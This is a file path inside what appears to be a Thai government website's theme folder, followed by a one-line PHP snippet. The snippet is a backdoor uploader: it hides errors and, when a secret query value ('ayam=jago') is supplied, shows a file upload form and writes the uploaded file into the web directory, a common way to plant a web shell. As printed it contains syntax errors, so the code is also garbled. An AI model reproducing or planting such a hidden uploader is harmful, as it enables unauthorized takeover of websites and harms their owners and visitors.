/home/banprang/domains/plai.go.th/public_html/songchan/theme/v08/index.php


1
<?php error_reporting(0); if($_GET['ayam'] == 'jago'){$saw1 $_FILES['file']['tmp_name'];$saw2 $_FILES['file']['name'];echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>"move_uploaded_file($saw1,$saw2); exit(0); } ?>